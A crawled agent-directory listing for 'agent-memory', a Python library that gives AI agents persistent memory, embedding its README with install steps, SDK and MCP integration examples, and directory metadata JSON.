Crawler Summary

agent-memory answer-first brief

Production-ready persistent memory for AI agents. Works with LangChain, CrewAI, AutoGen, and raw Anthropic/OpenAI SDKs โ€” in 3 lines of code. agentmemory ๐Ÿง  **Your AI agent forgets everything. AgentMemory fixes that in 3 lines.** $1 $1 $1 $1 **Claude Code / Cursor users** โ€” give your AI coding assistant a permanent memory for your codebase in 2 minutes. $1 --- The Problem Every time your agent starts a new session, it starts from zero. This isn't an AI limitation. It's a missing infrastructure layer. --- The Solution **That's it.** Memory persists to disk. Capability contract not published. No trust telemetry is available yet. 5 GitHub stars reported by the source. Last updated 4/15/2026.

Freshness

Last checked 4/15/2026

Best For

agent-memory is best for crewai, multi-agent workflows where OpenClaw compatibility matters.

Not Ideal For

Contract metadata is missing or unavailable for deterministic execution.

Evidence Sources Checked

editorial-content, GITHUB REPOS, runtime-metrics, public facts pack

Claim this agent
Agent DossierGITHUB REPOSSafety: 66/100

agent-memory

Production-ready persistent memory for AI agents. Works with LangChain, CrewAI, AutoGen, and raw Anthropic/OpenAI SDKs โ€” in 3 lines of code. agentmemory ๐Ÿง  **Your AI agent forgets everything. AgentMemory fixes that in 3 lines.** $1 $1 $1 $1 **Claude Code / Cursor users** โ€” give your AI coding assistant a permanent memory for your codebase in 2 minutes. $1 --- The Problem Every time your agent starts a new session, it starts from zero. This isn't an AI limitation. It's a missing infrastructure layer. --- The Solution **That's it.** Memory persists to disk.

OpenClawself-declared

Public facts

5

Change events

1

Artifacts

0

Freshness

Apr 15, 2026

Verifiededitorial-contentNo verified compatibility signals5 GitHub stars

Capability contract not published. No trust telemetry is available yet. 5 GitHub stars reported by the source. Last updated 4/15/2026.

5 GitHub starsTrust evidence available

Trust score

Unknown

Compatibility

OpenClaw

Freshness

Apr 15, 2026

Vendor

Pinexai

Artifacts

0

Benchmarks

0

Last release

Unpublished

Executive Summary

Key links, install path, and a quick operational read before the deeper crawl record.

Verifiededitorial-content

Summary

Capability contract not published. No trust telemetry is available yet. 5 GitHub stars reported by the source. Last updated 4/15/2026.

Setup snapshot

  1. 1

    Setup complexity is LOW. This package is likely designed for quick installation with minimal external side-effects.

  2. 2

    Final validation: Expose the agent to a mock request payload inside a sandbox and trace the network egress before allowing access to real customer data.

Evidence Ledger

Everything public we have scraped or crawled about this agent, grouped by evidence type with provenance.

Verifiededitorial-content
Vendor (1)

Vendor

Pinexai

profilemedium
Observed Apr 15, 2026Source linkProvenance
Compatibility (1)

Protocol compatibility

OpenClaw

contractmedium
Observed Apr 15, 2026Source linkProvenance
Adoption (1)

Adoption signal

5 GitHub stars

profilemedium
Observed Apr 15, 2026Source linkProvenance
Security (1)

Handshake status

UNKNOWN

trustmedium
Observed unknownSource linkProvenance
Integration (1)

Crawlable docs

6 indexed pages on the official domain

search_documentmedium
Observed Apr 15, 2026Source linkProvenance

Release & Crawl Timeline

Merged public release, docs, artifact, benchmark, pricing, and trust refresh events.

Self-declaredagent-index

Artifacts Archive

Extracted files, examples, snippets, parameters, dependencies, permissions, and artifact metadata.

Self-declaredGITHUB REPOS

Extracted files

0

Examples

6

Snippets

0

Languages

python

Executable Examples

python

# What happens today โ€” every single time
agent = MyAgent()
agent.chat("Hi, I'm Alice and I'm building a fraud detection system")
# โ†’ "Nice to meet you, Alice!"

# Next session...
agent = MyAgent()
agent.chat("What's my name?")
# โ†’ "I don't know your name โ€” could you tell me?"  โŒ

python

from agentmemory import MemoryStore

memory = MemoryStore(agent_id="my-agent")
memory.remember("User's name is Alice, building a fraud detection system in Python")

context = memory.get_context("What do we know about the user?")
# โ†’ "[Memory Context]\n- User's name is Alice, building a fraud detection system in Python"

bash

# Minimal install (SQLite episodic memory only, no external dependencies)
pip install agentcortex

# With semantic search + local embeddings (recommended)
pip install "agentcortex[chromadb,local]"

# Batteries included
pip install "agentcortex[all]"

python

from agentmemory import MemoryStore
import anthropic

memory = MemoryStore(agent_id="my-agent")
client = anthropic.Anthropic()

def chat(user_input: str) -> str:
    memory.add_message("user", user_input)

    response = client.messages.create(
        model="claude-opus-4-6",
        max_tokens=1024,
        system=f"You are a helpful assistant.\n\n{memory.get_context(user_input)}",
        messages=memory.get_messages(),
    )
    reply = response.content[0].text
    memory.add_message("assistant", reply)
    return reply

chat("Hi, I'm Alice and I'm building a fraud detection system")
chat("I prefer concise code examples")
# ... restart Python ...
chat("What do you know about me?")
# โ†’ "You're Alice, and you're building a fraud detection system in Python.
#    You prefer concise code examples."  โœ…

python

from agentmemory.adapters.openai import MemoryOpenAI

client = MemoryOpenAI(agent_id="my-agent")
client.chat("Hi, I'm Alice")
client.chat("I'm building a fraud detection system")
# Next session...
client.chat("What's my name?")  # โ†’ "Your name is Alice." โœ…

python

from agentmemory import MemoryStore
from agentmemory.adapters.langchain import MemoryHistory, inject_memory_context
from langchain_anthropic import ChatAnthropic

memory = MemoryStore(agent_id="my-agent")
history = MemoryHistory(memory_store=memory)
llm = ChatAnthropic(model="claude-opus-4-6")

history.add_user_message("Hello, I'm Alice")
messages = inject_memory_context(history.messages, memory, query="Alice")
response = llm.invoke(messages)

Docs & README

Full documentation captured from public sources, including the complete README when available.

Self-declaredGITHUB REPOS

Docs source

GITHUB REPOS

Editorial quality

ready

Production-ready persistent memory for AI agents. Works with LangChain, CrewAI, AutoGen, and raw Anthropic/OpenAI SDKs โ€” in 3 lines of code. agentmemory ๐Ÿง  **Your AI agent forgets everything. AgentMemory fixes that in 3 lines.** $1 $1 $1 $1 **Claude Code / Cursor users** โ€” give your AI coding assistant a permanent memory for your codebase in 2 minutes. $1 --- The Problem Every time your agent starts a new session, it starts from zero. This isn't an AI limitation. It's a missing infrastructure layer. --- The Solution **That's it.** Memory persists to disk.

Full README

agentmemory ๐Ÿง 

Your AI agent forgets everything. AgentMemory fixes that in 3 lines.

PyPI version Tests Python 3.10+ License: MIT

Claude Code / Cursor users โ€” give your AI coding assistant a permanent memory for your codebase in 2 minutes. Jump to MCP setup โ†’


The Problem

Every time your agent starts a new session, it starts from zero.

# What happens today โ€” every single time
agent = MyAgent()
agent.chat("Hi, I'm Alice and I'm building a fraud detection system")
# โ†’ "Nice to meet you, Alice!"

# Next session...
agent = MyAgent()
agent.chat("What's my name?")
# โ†’ "I don't know your name โ€” could you tell me?"  โŒ

This isn't an AI limitation. It's a missing infrastructure layer.


The Solution

from agentmemory import MemoryStore

memory = MemoryStore(agent_id="my-agent")
memory.remember("User's name is Alice, building a fraud detection system in Python")

context = memory.get_context("What do we know about the user?")
# โ†’ "[Memory Context]\n- User's name is Alice, building a fraud detection system in Python"

That's it. Memory persists to disk. It's there next session, and the one after that.


Install

# Minimal install (SQLite episodic memory only, no external dependencies)
pip install agentcortex

# With semantic search + local embeddings (recommended)
pip install "agentcortex[chromadb,local]"

# Batteries included
pip install "agentcortex[all]"

Quick Start

With Anthropic

from agentmemory import MemoryStore
import anthropic

memory = MemoryStore(agent_id="my-agent")
client = anthropic.Anthropic()

def chat(user_input: str) -> str:
    memory.add_message("user", user_input)

    response = client.messages.create(
        model="claude-opus-4-6",
        max_tokens=1024,
        system=f"You are a helpful assistant.\n\n{memory.get_context(user_input)}",
        messages=memory.get_messages(),
    )
    reply = response.content[0].text
    memory.add_message("assistant", reply)
    return reply

chat("Hi, I'm Alice and I'm building a fraud detection system")
chat("I prefer concise code examples")
# ... restart Python ...
chat("What do you know about me?")
# โ†’ "You're Alice, and you're building a fraud detection system in Python.
#    You prefer concise code examples."  โœ…

With OpenAI

from agentmemory.adapters.openai import MemoryOpenAI

client = MemoryOpenAI(agent_id="my-agent")
client.chat("Hi, I'm Alice")
client.chat("I'm building a fraud detection system")
# Next session...
client.chat("What's my name?")  # โ†’ "Your name is Alice." โœ…

With LangChain

from agentmemory import MemoryStore
from agentmemory.adapters.langchain import MemoryHistory, inject_memory_context
from langchain_anthropic import ChatAnthropic

memory = MemoryStore(agent_id="my-agent")
history = MemoryHistory(memory_store=memory)
llm = ChatAnthropic(model="claude-opus-4-6")

history.add_user_message("Hello, I'm Alice")
messages = inject_memory_context(history.messages, memory, query="Alice")
response = llm.invoke(messages)

With CrewAI

from agentmemory import MemoryStore
from agentmemory.adapters.crewai import CrewMemoryCallback, get_memory_context_for_agent
from crewai import Agent, Task

memory = MemoryStore(agent_id="research-crew")

agent = Agent(
    role="Researcher",
    goal="Research AI topics",
    backstory=get_memory_context_for_agent(memory, "Researcher") + "\nExpert researcher.",
)

task = Task(
    description="Research memory systems for AI agents",
    expected_output="Structured research findings",
    agent=agent,
    callback=CrewMemoryCallback(memory),  # Auto-stores task output
)

How It Works

AgentMemory uses a three-tier architecture that mirrors how human memory works:

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                    Your LLM / Agent                     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                      โ”‚  get_context() / add_message()
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                   MemoryStore                           โ”‚
โ”‚                                                         โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚
โ”‚  โ”‚   Working   โ”‚  โ”‚   Episodic   โ”‚  โ”‚   Semantic    โ”‚  โ”‚
โ”‚  โ”‚   Memory    โ”‚  โ”‚   Memory     โ”‚  โ”‚   Memory      โ”‚  โ”‚
โ”‚  โ”‚             โ”‚  โ”‚              โ”‚  โ”‚               โ”‚  โ”‚
โ”‚  โ”‚ Current     โ”‚  โ”‚ Recent       โ”‚  โ”‚ Long-term     โ”‚  โ”‚
โ”‚  โ”‚ session     โ”‚  โ”‚ history      โ”‚  โ”‚ knowledge     โ”‚  โ”‚
โ”‚  โ”‚ (in-RAM)    โ”‚  โ”‚ (SQLite)     โ”‚  โ”‚ (ChromaDB)    โ”‚  โ”‚
โ”‚  โ”‚             โ”‚  โ”‚              โ”‚  โ”‚               โ”‚  โ”‚
โ”‚  โ”‚ Auto-       โ”‚  โ”‚ Persists     โ”‚  โ”‚ Semantic      โ”‚  โ”‚
โ”‚  โ”‚ compresses  โ”‚  โ”‚ forever      โ”‚  โ”‚ search        โ”‚  โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Working Memory โ€” the current conversation window. Automatically compresses old messages into summaries when it nears the token limit.

Episodic Memory โ€” recent interactions stored in SQLite. No setup required. Evicts least-important entries when full.

Semantic Memory โ€” long-term facts stored as vector embeddings (ChromaDB). Retrieved by meaning, not keyword.


Features

  • Framework-agnostic โ€” works with LangChain, CrewAI, AutoGen, or any raw SDK
  • Local-first โ€” runs entirely on your machine, no cloud required
  • Auto-compression โ€” context window never overflows; old messages are summarized automatically
  • Semantic deduplication โ€” stops storing near-identical facts that pollute retrieval
  • Importance scoring โ€” critical memories survive longer; low-priority ones get evicted first
  • Pluggable backends โ€” ChromaDB (local) or Qdrant (production scale) for semantic memory
  • Zero-config defaults โ€” just MemoryStore(agent_id="x") and you're running

API Reference

MemoryStore

MemoryStore(
    agent_id: str,                        # Unique ID โ€” memories are namespaced by this
    persist_dir: str = "~/.agentmemory", # Where to store memories
    max_working_tokens: int = 4096,      # Token budget before compression triggers
    semantic_backend: str = "chromadb",  # "chromadb" | "qdrant"
    embedding_provider: str = "sentence-transformers",  # "sentence-transformers" | "openai"
    llm_provider: str = "anthropic",     # LLM for compression: "anthropic" | "openai"
    enable_dedup: bool = True,           # Deduplicate before storing
    auto_compress: bool = True,          # Auto-compress when window fills
)

| Method | Description | |---|---| | memory.remember(content, importance=5) | Store a fact in episodic + semantic memory | | memory.recall(query, n=5) | Retrieve top-n relevant memories by meaning | | memory.get_context(query, max_tokens=500) | Get formatted context string for system prompt | | memory.add_message(role, content) | Track a conversation turn in working memory | | memory.get_messages() | Get current working memory as [{role, content}] | | memory.compress() | Manually trigger compression of working memory | | memory.stats() | Get memory usage stats across all tiers | | memory.clear(tiers=None) | Clear specific or all memory tiers |


Claude Code Integration โ€” Persistent Codebase Memory

Stop re-explaining your codebase every session. Claude will remember architecture decisions, bug fixes, and your preferences โ€” automatically.

The problem: Every time you open Claude Code, it starts from zero. You repeat the same context, re-explain the same constraints, watch it make the same mistakes.

The fix: 2-minute setup. Claude permanently remembers everything it learns about your project.

Setup (2 minutes)

Step 1 โ€” Install:

pip install "agentcortex[mcp]"

Step 2 โ€” Create .mcp.json in your project root:

{
  "mcpServers": {
    "agentmemory": {
      "type": "stdio",
      "command": "python",
      "args": ["-m", "agentmemory.mcp_server"],
      "env": {
        "AGENTMEMORY_AGENT_ID": "your-project-name"
      }
    }
  }
}

Step 3 โ€” Open Claude Code and run /mcp โ€” you'll see agentmemory connected with 5 tools. Done.

What changes immediately

Session 1 โ€” You: "Fix the race condition in payment/process_transaction.py"
Claude fixes it, then stores:
  remember("payment/process_transaction.py: race condition fixed with DB-level
   lock. NEVER use in-memory locks โ€” they don't survive multiple workers.",
   importance=9)

โ”€โ”€ one week later โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

Session 2 โ€” You: "Add retry logic to the payment module"
Claude automatically calls: get_context("payment module retry logic")
Retrieves: "process_transaction.py: use DB-level locks, not in-memory"
Claude: "I remember this module had a concurrency issue. I'll make sure
         the retry logic respects the DB-level lock..."

No re-explaining. No repeated mistakes. Claude gets smarter about your codebase over time.

Available MCP tools

| Tool | What it does | |---|---| | get_context(query, max_tokens) | Returns relevant memories for the current task โ€” call at session start | | remember(content, importance) | Store a fact, decision, or gotcha (importance 1โ€“10) | | recall(query, n) | Semantic search over all stored memories | | memory_stats() | Show memory counts across working / episodic / semantic tiers | | clear_memory(tiers) | Reset memories |

Environment variables

| Variable | Default | Description | |---|---|---| | AGENTMEMORY_AGENT_ID | "default" | Memory namespace โ€” one per project | | AGENTMEMORY_PERSIST_DIR | ~/.agentmemory | Where memories are stored on disk | | AGENTMEMORY_LLM_PROVIDER | "anthropic" | LLM for auto-compression: "anthropic" or "openai" |

Works with Claude Code, Cursor, and any MCP-compatible AI coding assistant.


AutoGen Integration

Give AutoGen agents persistent memory that survives across sessions.

from agentmemory import MemoryStore
from agentmemory.adapters.autogen import AutoGenMemoryHook, get_autogen_memory_context
import autogen

memory = MemoryStore(agent_id="my-autogen-agent")

# Inject past context into the agent's system_message
context = get_autogen_memory_context(memory, role="Research Assistant",
                                     goal="literature review on LLMs")

assistant = autogen.AssistantAgent(
    name="researcher",
    system_message=context + "\nYou are a helpful research assistant.",
    llm_config={"model": "gpt-4o-mini"},
)

# Hook captures every reply and stores it in memory
hook = AutoGenMemoryHook(memory, importance=6)
assistant.register_reply(
    trigger=autogen.ConversableAgent,
    reply_func=hook.on_agent_reply,
    position=0,
)

Install: pip install "agentcortex[autogen]"


Qdrant Production Backend

Scale to millions of vectors with a dedicated vector database.

from agentmemory import MemoryStore

# docker run -p 6333:6333 qdrant/qdrant
memory = MemoryStore(
    agent_id="my-agent",
    semantic_backend="qdrant",
    qdrant_url="http://localhost:6333",      # or Qdrant Cloud URL
    embedding_provider="sentence-transformers",
)

memory.remember("Production architecture uses microservices", importance=8)
results = memory.recall("architecture")

Install: pip install "agentcortex[qdrant]"


Memory Export / Import (JSON)

Back up and restore episodic memories across machines or agent instances.

from agentmemory import MemoryStore

memory = MemoryStore(agent_id="my-agent")
memory.remember("PostgreSQL is our main database", importance=8)

# Export to JSON file
memory.export_json("backup.json")

# Restore on another machine / new agent
new_memory = MemoryStore(agent_id="new-agent")
count = new_memory.import_json("backup.json")
print(f"Imported {count} memories")

# Merge instead of replacing
new_memory.import_json("backup.json", merge=True)

# Or work with the dict directly
data = memory.export_json()   # no path โ†’ returns dict only
new_memory.import_json(data)

Memory CLI

Inspect and manage memories from the command line.

# Inspect stored memories
agentmemory inspect --agent-id my-project

# agentmemory โ€” agent: my-project
# โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
# EPISODIC MEMORY  (3 entries)
# โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
#   #   IMP   Created              Content
#   1    9    2026-02-28 14:23:01  We use PostgreSQL for relational...
#   2    7    2026-02-27 09:14:55  payment/process_transaction.py h...
#   3    5    2026-02-26 18:30:12  User prefers functional style ove...

# Export memories to JSON
agentmemory export --agent-id my-project --output memories.json

# Import memories (restores; use --merge to add alongside existing)
agentmemory import memories.json --agent-id new-project --merge

Install: pip install agentcortex (the CLI is always included)


Async Support

Use agentmemory in FastAPI, aiohttp, or any async Python application.

import asyncio
from agentmemory import AsyncMemoryStore

async def main():
    # Identical API to MemoryStore โ€” just add await
    memory = AsyncMemoryStore(agent_id="my-async-agent")

    await memory.remember("User prefers Python over JavaScript", importance=7)
    results = await memory.recall("tech stack")
    context = await memory.get_context("What do we know?")

    # Export / import work the same way
    data = await memory.export_json()
    await memory.import_json(data)

    memory.close()

# Or use as an async context manager
async def with_context_manager():
    async with AsyncMemoryStore(agent_id="my-agent") as memory:
        await memory.remember("Context manager closes executor automatically")
        ctx = await memory.get_context()
        print(ctx)

asyncio.run(main())

Install: pip install agentcortex (AsyncMemoryStore is always included)


Comparison

| | MemGPT | LangChain Memory | AgentMemory | |---|---|---|---| | Framework | MemGPT only | LangChain only | Any framework | | Composable library | No | Partial | Yes | | Local-first | Partial | No | Yes | | Auto-compression | Yes | No | Yes | | Semantic search | Yes | Partial | Yes | | Deduplication | No | No | Yes | | PyPI installable | No | Yes | Yes | | Zero config | No | Partial | Yes |


Roadmap

  • [x] AutoGen adapter (pip install "agentcortex[autogen]")
  • [x] Qdrant production backend (pip install "agentcortex[qdrant]")
  • [x] Memory export/import (JSON) โ€” memory.export_json() / memory.import_json()
  • [x] Memory visualization CLI โ€” agentmemory inspect / export / import
  • [x] Async support โ€” AsyncMemoryStore with full await API
  • [x] MCP server integration (pip install "agentcortex[mcp]")

Contributing

Contributions are welcome. See CONTRIBUTING.md.

git clone https://github.com/pinakimishra95/agent-memory
cd agent-memory
pip install -e ".[dev]"
pytest tests/

License

MIT. See LICENSE.


Star this repo if you're tired of your agents forgetting everything. ๐ŸŒŸ

Contract & API

Machine endpoints, protocol fit, contract coverage, invocation examples, and guardrails for agent-to-agent use.

MissingGITHUB REPOS

Contract coverage

Status

missing

Auth

None

Streaming

No

Data region

Unspecified

Protocol support

OpenClaw: self-declared

Requires: none

Forbidden: none

Guardrails

Operational confidence: low

No positive guardrails captured.
Invocation examples
curl -s "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/snapshot"
curl -s "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/contract"
curl -s "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/trust"

Reliability & Benchmarks

Trust and runtime signals, benchmark suites, failure patterns, and practical risk constraints.

Missingruntime-metrics

Trust signals

Handshake

UNKNOWN

Confidence

unknown

Attempts 30d

unknown

Fallback rate

unknown

Runtime metrics

Observed P50

unknown

Observed P95

unknown

Rate limit

unknown

Estimated cost

unknown

Do not use if

Contract metadata is missing or unavailable for deterministic execution.
No benchmark suites or observed failure patterns are available.

Media & Demo

Every public screenshot, visual asset, demo link, and owner-provided destination tied to this agent.

Missingno-media
No screenshots, media assets, or demo links are available.

Related Agents

Neighboring agents from the same protocol and source ecosystem for comparison and shortlist building.

Self-declaredprotocol-neighbors
GITHUB_REPOSactivepieces

Rank

70

AI Agents & MCPs & AI Workflow Automation โ€ข (~400 MCP servers for AI agents) โ€ข AI Automation / AI Agent with MCPs โ€ข AI Workflows & AI Agents โ€ข MCPs for AI Agents

Traction

No public download signal

Freshness

Updated 2d ago

OPENCLAW
GITHUB_REPOScherry-studio

Rank

70

AI productivity studio with smart chat, autonomous agents, and 300+ assistants. Unified access to frontier LLMs

Traction

No public download signal

Freshness

Updated 5d ago

MCPOPENCLAW
GITHUB_REPOSAionUi

Rank

70

Free, local, open-source 24/7 Cowork app and OpenClaw for Gemini CLI, Claude Code, Codex, OpenCode, Qwen Code, Goose CLI, Auggie, and more | ๐ŸŒŸ Star if you like it!

Traction

No public download signal

Freshness

Updated 6d ago

MCPOPENCLAW
GITHUB_REPOSCopilotKit

Rank

70

The Frontend for Agents & Generative UI. React + Angular

Traction

No public download signal

Freshness

Updated 23d ago

OPENCLAW
Machine Appendix

Contract JSON

{
  "contractStatus": "missing",
  "authModes": [],
  "requires": [],
  "forbidden": [],
  "supportsMcp": false,
  "supportsA2a": false,
  "supportsStreaming": false,
  "inputSchemaRef": null,
  "outputSchemaRef": null,
  "dataRegion": null,
  "contractUpdatedAt": null,
  "sourceUpdatedAt": null,
  "freshnessSeconds": null
}

Invocation Guide

{
  "preferredApi": {
    "snapshotUrl": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/snapshot",
    "contractUrl": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/contract",
    "trustUrl": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/trust"
  },
  "curlExamples": [
    "curl -s \"https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/snapshot\"",
    "curl -s \"https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/contract\"",
    "curl -s \"https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/trust\""
  ],
  "jsonRequestTemplate": {
    "query": "summarize this repo",
    "constraints": {
      "maxLatencyMs": 2000,
      "protocolPreference": [
        "OPENCLEW"
      ]
    }
  },
  "jsonResponseTemplate": {
    "ok": true,
    "result": {
      "summary": "...",
      "confidence": 0.9
    },
    "meta": {
      "source": "GITHUB_REPOS",
      "generatedAt": "2026-04-17T00:36:58.622Z"
    }
  },
  "retryPolicy": {
    "maxAttempts": 3,
    "backoffMs": [
      500,
      1500,
      3500
    ],
    "retryableConditions": [
      "HTTP_429",
      "HTTP_503",
      "NETWORK_TIMEOUT"
    ]
  }
}

Trust JSON

{
  "status": "unavailable",
  "handshakeStatus": "UNKNOWN",
  "verificationFreshnessHours": null,
  "reputationScore": null,
  "p95LatencyMs": null,
  "successRate30d": null,
  "fallbackRate": null,
  "attempts30d": null,
  "trustUpdatedAt": null,
  "trustConfidence": "unknown",
  "sourceUpdatedAt": null,
  "freshnessSeconds": null
}

Capability Matrix

{
  "rows": [
    {
      "key": "OPENCLEW",
      "type": "protocol",
      "support": "unknown",
      "confidenceSource": "profile",
      "notes": "Listed on profile"
    },
    {
      "key": "crewai",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "multi-agent",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    }
  ],
  "flattenedTokens": "protocol:OPENCLEW|unknown|profile capability:crewai|supported|profile capability:multi-agent|supported|profile"
}

Facts JSON

[
  {
    "factKey": "vendor",
    "category": "vendor",
    "label": "Vendor",
    "value": "Pinexai",
    "href": "https://github.com/pinexai/agent-memory",
    "sourceUrl": "https://github.com/pinexai/agent-memory",
    "sourceType": "profile",
    "confidence": "medium",
    "observedAt": "2026-04-15T06:04:38.893Z",
    "isPublic": true
  },
  {
    "factKey": "protocols",
    "category": "compatibility",
    "label": "Protocol compatibility",
    "value": "OpenClaw",
    "href": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/contract",
    "sourceUrl": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/contract",
    "sourceType": "contract",
    "confidence": "medium",
    "observedAt": "2026-04-15T06:04:38.893Z",
    "isPublic": true
  },
  {
    "factKey": "traction",
    "category": "adoption",
    "label": "Adoption signal",
    "value": "5 GitHub stars",
    "href": "https://github.com/pinexai/agent-memory",
    "sourceUrl": "https://github.com/pinexai/agent-memory",
    "sourceType": "profile",
    "confidence": "medium",
    "observedAt": "2026-04-15T06:04:38.893Z",
    "isPublic": true
  },
  {
    "factKey": "docs_crawl",
    "category": "integration",
    "label": "Crawlable docs",
    "value": "6 indexed pages on the official domain",
    "href": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceUrl": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceType": "search_document",
    "confidence": "medium",
    "observedAt": "2026-04-15T05:03:46.393Z",
    "isPublic": true
  },
  {
    "factKey": "handshake_status",
    "category": "security",
    "label": "Handshake status",
    "value": "UNKNOWN",
    "href": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/trust",
    "sourceUrl": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/trust",
    "sourceType": "trust",
    "confidence": "medium",
    "observedAt": null,
    "isPublic": true
  }
]

Change Events JSON

[
  {
    "eventType": "docs_update",
    "title": "Docs refreshed: Sign in to GitHub ยท GitHub",
    "description": "Fresh crawlable documentation was indexed for the official domain.",
    "href": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceUrl": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceType": "search_document",
    "confidence": "medium",
    "observedAt": "2026-04-15T05:03:46.393Z",
    "isPublic": true
  }
]

Sponsored

Ads related to agent-memory and adjacent AI workflows.